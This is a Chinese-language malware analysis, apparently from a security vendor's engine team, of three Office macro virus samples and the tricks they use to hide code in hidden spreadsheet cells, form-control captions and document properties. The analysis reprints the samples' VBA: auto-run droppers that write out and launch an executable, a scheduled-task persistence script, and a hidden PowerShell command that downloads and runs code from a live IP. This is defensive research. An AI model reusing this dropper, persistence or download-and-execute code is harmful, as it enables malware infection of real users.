作為一類古老的病毒,宏病毒隨著勒索軟件的興起而卷土重來。尤其是在2016年,以Locky為代表的勒索軟件利用Office宏肆虐傳播,宏病毒也成為目前最活躍的病毒品種之一。
在與安全軟件的對抗中,宏病毒使用了多種手段隱藏其惡意代碼或數據,近期出現的新變種則是利用Excel表格的函數動態生成PE文件數據、設置遠距離存放位置、隱藏顯示、不同表切換等方式進行隱藏。接下來,360QEX引擎團隊將對宏病毒代碼流行的三類“隱身術”進行逐一揭秘。
virustotal 掃描結果:
樣本對自身 VBAProject 進行了加密,
破解之后,看到了宏代碼執行入口函數 Auto_Open,
#!vb
Sub Auto_Open()
On Error Resume Next
Application.DisplayAlerts = False
Dim WB As Workbook
Set WB = ActiveWorkbook
Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
Set sh3 = WB.Sheets(3)
Dim str As String
str = Sh2.Cells(996, 40)
Dim t As Date
t = Now + TimeSerial(0, 0, 1)
Application.OnTime t, str
End Sub
病毒作者使用 Application.OnTime 函數,間隔 1 秒,執行 字符串 “str” ,”str” 的值是從表格 Cells(996, 40) 中獲取,當去查看表格中該處值時發現病毒更改了Excel單元格格式 ,把數據隱藏顯示。
單元格格式設置為三個 ;;; 時,單元格內容就會被隱藏。
單元格的格式默認是顯示的,初始設置為,
去掉隱藏后,查看表格中該值是 Fnslr12 , 即病毒的功能入口函數名稱,函數代碼為,
#!vb
Sub Fnslr12()
On Error Resume Next
Application.DisplayAlerts = False
Call Build
Sheets(1).Select
Dim WB As Workbook
Set WB = ActiveWorkbook
Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
If Cells(2, 1) <> "" Then
GoTo skyhigh
End If
''' 以下省略
因此,該函數為病毒代碼的主功能函數。
此函數的功能有,
調用 Build 函數, Build 函數功能為:在表格中動態生成,待寫入 可執行文件(pe文件)所需的數據,其功能代碼簡略如下,
#!vb
Sub Build()
Sheets(2).Select
Set WB = ActiveWorkbook
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
'bob location
i = Sh2.Cells(1000, 12)
j = Sh2.Cells(1000, 13)
'index table location
R = Sh2.Cells(1000, 10)
C = Sh2.Cells(1000, 11)
Counter = R
Do While Sh2.Cells(Counter, C) <> ""
If Sh2.Cells(Counter, C + 1) <> "" Then
S1 = Sh2.Cells(Counter, C)
S2 = Sh2.Cells(Counter, C + 1)
End If
Counter = Counter + 1
Loop
Cells(i, j).Select
Range(Selection, Selection.End(xlDown)).Select
Selection.Cut
Range("i1001").Select
ActiveSheet.Paste
Cells(1, 1).Select
End Sub
函數運行結果為,在 1001 行往下,依次每行填入數據。
#!vb
If Cells(2, 1) <> "" Then
GoTo skyhigh
End If
當運行過一次之后, Cells(2,1) 表格會被寫入值,會在這里進入語句 Then ,執行 “Goto skyhigh” 語句, “skyhigh” 標記定位在函數尾部,即執行該語句后會退出該函數。
從代碼意圖猜測,病毒作者想在 %userprofile% AppDataRoamingMicrosoftTemplates 生成一個名為Macro1.vbs 的vbs文件 ,
#!vb
Dim Fnslr1 As String
Dim Fnslr2 As String
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplatesMacro1.vbs"
ChDrive (Fnslr2)
If Dir(Fnslr2) = "" Then
Else
End If
其中,病毒拼湊生成文件的目錄路徑時,從表格 2 的Cells(998, 40) 中讀取 ,該值為環境變量值 userprofile.
只是,病毒作者并沒有繼續完善相關代碼。實際測試運行樣本也并沒有生成該文件,猜測可能作者后續加入該功能,或者該功能已經被取消。
在 %serprofile% AppDataRoamingMicrosoftTemplates 目錄生成可執行文件 Macro1.exe,
#!vb
Dim i As Double
i = 1000
Fnslr1 = "Macro1.exe"
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
Fnslr3 = FreeFile()
Open Fnslr1 For Binary As Fnslr3
Do While Sh2.Cells(i, 9) <> ""
Fnslr11 = Sh2.Cells(i, 9)
If (Fnslr9 = True) Then
Fnslr8 = 1
Do While (Fnslr8 < Len(Fnslr11))
Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
Put #Fnslr3, , Fnslr6
Fnslr8 = Fnslr8 + 3
Loop
End If
If Fnslr9 = False Then
Fnslr9 = True
End If
i = i + 1
Loop
Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
Fnslr7 = Shell(Fnslr10, vbHide)
Dim i As Double
i = 1000
Fnslr1 = "Macro1.exe"
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
Fnslr3 = FreeFile()
Open Fnslr1 For Binary As Fnslr3
Do While Sh2.Cells(i, 9) <> ""
Fnslr11 = Sh2.Cells(i, 9)
If (Fnslr9 = True) Then
Fnslr8 = 1
Do While (Fnslr8 < Len(Fnslr11))
Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
Put #Fnslr3, , Fnslr6
Fnslr8 = Fnslr8 + 3
Loop
End If
If Fnslr9 = False Then
Fnslr9 = True
End If
i = i + 1
Loop
Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
Fnslr7 = Shell(Fnslr10, vbHide)
寫入 Macro1.exe 所需的數據,從 Excel 表格中 Cells(997, 40) 周圍讀取,實際測試數據開始位置是 1001行,
代碼尾部使用 Shell 函數,啟動生成的 Macro1.exe 。
文件信息
可執行文件是 x64位的,功能是,啟動 powershell 附帶 –enc 參數,執行一段 shellcode ,這段 shellcode是一個 reverse shell ,連接黑客服務器,等待下達命令。
此部分與下面創建計劃任務不間斷運行的功能呼應起來,此部分不是本文重點,不再詳述。
在 %serprofile% AppDataRoamingMicrosoftTemplates 目錄生成 bat (cmd) 批處理腳本文件 Macro1.bat,
#!vb
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
Dim User As String
User = Environ(Sh2.Cells(998, 40))
Fname = Fnslr2 & "Macro1.bat"
FNum = FreeFile
Open Fname For Output Access Write As #FNum
WholeLine = "SchTasks /Create /SC HOURLY /TN " & Sh2.Cells(1000, 3) & "Macro1" & Sh2.Cells(1000, 3) & " /TR" & " " & User & "AppDataRoamingMicrosoftTemplates" & "Macro1.exe /ST 01:00"
Print #FNum, WholeLine
Close #FNum
Dim TempFileName As String
TempFileName = Fnslr2 & "Macro1.bat"
Shell TempFileName, vbHide
尾部使用 Shell 函數 啟動該腳本,結果是在用戶機器創建了一個計劃任務, 每隔一小時運行一次 上面生成的 Macro1.exe 。
#!vb
pword = InputBox("Please enter a password to proceed", "Password Required", "*******")
Select Case pword
Case Is = ""
MsgBox "Try Again"
Case "Alon2016"
RP = 1
Case Is <> "Alon2016"
MsgBox "Try Again"
End Select
從病毒代碼中知道,要求輸入的密碼是 “Alon2016” 。
接下來是現場清理和掩飾,刪除調用Build 函數在表格生成的數據,在表格的開頭顯著位置填入在其他表格中保存的郵件收件人地址信息,
小結:該樣本的特別之處有:
此類病毒把部分代碼隱藏到 VBA 工程中的 用戶控件(User Form)中,甚至把帶有代碼的控件最小化,使之不易被看到。
virustotal 掃描結果:
查看該文件的宏,
此文件看起來像是正常的SQL操作類的宏代碼,但是當我們查看窗體 Ultra 時發現,
有個控件的Caption中存放了可疑數據如下,
#!bash
D!icrobrioft.XD!LHTTP10)Adodb.britr00aD!10)brih00ll.Application10)Wbricript.brih00ll10)Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)hendib00.00x00
此數據在宏代碼中被使用的位置為,
#!vb
CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")
其中,CadenaCurrency 是一個簡單的 Replace 調用,
#!vb
Public Function CadenaCurrency(A1 As String, A2 As String, A3 As String) As String
CadenaCurrency = Replace(A1, A2, A3)
End Function
解密方法是,
#!vb
Dim aproblems As String
aproblems = CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")
aproblems = CadenaCurrency(aproblems, "D!", "M")
aproblems = CadenaCurrency(aproblems, "bri", "s")
constans_problems = Split(aproblems, "10)")
解密為,
#!bash
Microsoft.XMLHTTP
Adodb.stream
shell.Application
Wscript.shell
Process
GeT
Temp
Type
open
write
responseBody
savetofile
hendibe.exe
幾個字符串呈現出非常明顯的意圖,下載(Microsoft.XMLHTTP)+ 寫文件(Adodb.stream)+ 執行(shell.Application / Wscript.shell)。
此樣本因為代碼有問題,沒能成功運行起來。找到宏代碼中使用 Microsoft.XMLHTTP 對象下載文件的位置,加上斷點調試,起先因為作者疏忽,忘記書寫一個雙引號,導致編譯失敗,
之后,運行到下載文件處時,出現了報錯。
此類病毒把代碼核心惡意部分放入文檔的內建屬性中。
virustotal 掃描結果:
此樣本的vba 宏代碼只有1個文件,很簡短,
#!vb
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
Call winshell
End Sub
Sub AutoOpen()
Call winshell
End Sub
Function winshell() As Object
On Error Resume Next
Err.Clear
Dim ps As String
ps = ActiveDocument.BuiltInDocumentProperties("Manager").Value
Dim Obj As Object
Set Obj = CreateObject("WScript.Shell")
Obj.Run ps, 0
Application.DisplayAlerts = False
End Function
響應兩個文檔打開事件,AutoOpen 與Auto_Open,直接執行 winshell函數, winshell函數讀取文件內建屬性,Manager 的值,直接執行起來。Manager值,我們使用右鍵文件屬性,查看為,
#!powershell
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://37.28.154.204:8081/ygklKbyIVG51Kol');
是一段 Powershell 執行的腳本代碼,從指定 URL (http://37.28.154.204:8081/ygklKbyIVG51Kol) 下載文件。目前測試此URL已經無法訪問。
以加密勒索為代表的病毒,越來越多的使用Office宏,js,vbs等非Pe文件來傳播。通過腳本代碼動態向Windows 目錄中釋放可執行文件或者從服務器下載可執行文件。
非PE病毒查殺引擎QEX是 360安全產品中負責查殺宏病毒及vbs、js、html等腳本病毒的獨有引擎。上述樣本QEX引擎均已查殺。
在這里也提醒 Microsoft Office 文檔系列軟件的使用用戶,
如日常無使用宏的需求,請禁用 Office 宏,禁用方式參考
對于經常使用宏工作的用戶,請安裝安全軟件,定期更新病毒庫,對于他人發送的文檔,在打開之前請先掃描。